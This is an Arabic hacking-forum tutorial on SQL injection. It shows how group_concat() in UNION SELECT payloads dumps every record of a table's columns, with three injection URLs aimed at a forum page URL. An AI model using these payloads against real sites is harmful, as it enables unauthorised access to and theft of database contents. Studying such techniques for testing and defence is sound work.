SQL INJECTION , دورة SQL injection , دروة الحقن, دورة حقن sql injection , شرح استغلال ثغرات sql injection , شرح دورة الحقن , شرح sql injection , شرح group_concat ، شرح استغلال group_concat
بسم الله الرحمن الرحيم
السلام عليكم ورحمة الله وبركاته
درس اليوم يتكلم عن group_concat()
هذا الدرس مقدم من منتديات جيوش الهكرز و ASDELY.NET بواسطة ASDELY-ScOrPiOn
طيب بعطي مثال وان شاء الله تفهموا
لنفرض انه عندنا موقع ومركب عليه قاعدة بيانات اسمها ASDELY.NET وداخلها يوجد جدول اسمه Aljyyosh.com
وداخله عمودان
الاول اسمه Site
والثاني اسمه Name
ويوجد داخله 3 سجلات ، كما في الصورة التاليه
ولنفرض انه عندنا ثغرة sql injection على الموقع والعامود الرابع مصاب
لنفرض انه هذا الموقع
http://www.aljyyosh.com/vb/forumdisplay.php?f=76
طيب نطبق الثغره عليه ونستخرج السجلات منه ، يصير الرابط هيك
كود:
http://www.aljyyosh.com/vb/forumdisplay.php?f=76+union+select+1,2,3,Name,5,6,7,8,9,10+from+Aljyyosh.com--
بعد تنفيذ هذا الامر رح تطلع لنا النتيجه فقط ASDELY-ScOrPiOn
بس احنا نريد ان نستخرج جميل السجلات وليس سجل واحد! ،
او نحن نريد ان نستخرج جميل السجيلات من العامودين Name و Site
رح يكون الامر كالتالي
كود:
http://www.aljyyosh.com/vb/forumdisplay.php?f=76+union+select+1,2,3,group_concat(Name),5,6,7,8,9,10+from+Aljyyosh.com--
في هذا الامر رح يستخرج لنا جميع السجلات ، بمعنى انه رح يطلع لنا
ASDELY-ScOrPiOn;Black.jaguar;ASDELY-ScOrPiOn
او ننفذ الامر التالي حتى يستخرج لنا جميع السجلات وكل اسم وجنبه موقعه
كود:
http://www.aljyyosh.com/vb/forumdisplay.php?f=76+union+select+1,2,3,group_concat(Name,0x3e,Site),5,6,7,8,9,10+from+Aljyyosh.com--
بإختصار هذه الدالة كحلقة تكرار ،...، بمعنى اسهل انو هذه الدالة تستخرجلك كل السجلات مع بعض او استخراج جميل السجيلات من اكثر من عامود!
انتهى الشرح
، وأي شيء غير مفهوم انا موجود وما بقصر
بالتوفيق للجميع... اخوكم ASDELY-ScOrPiOn
مع تحيات منتديات جيوش الهكرز و ASDELY.NET
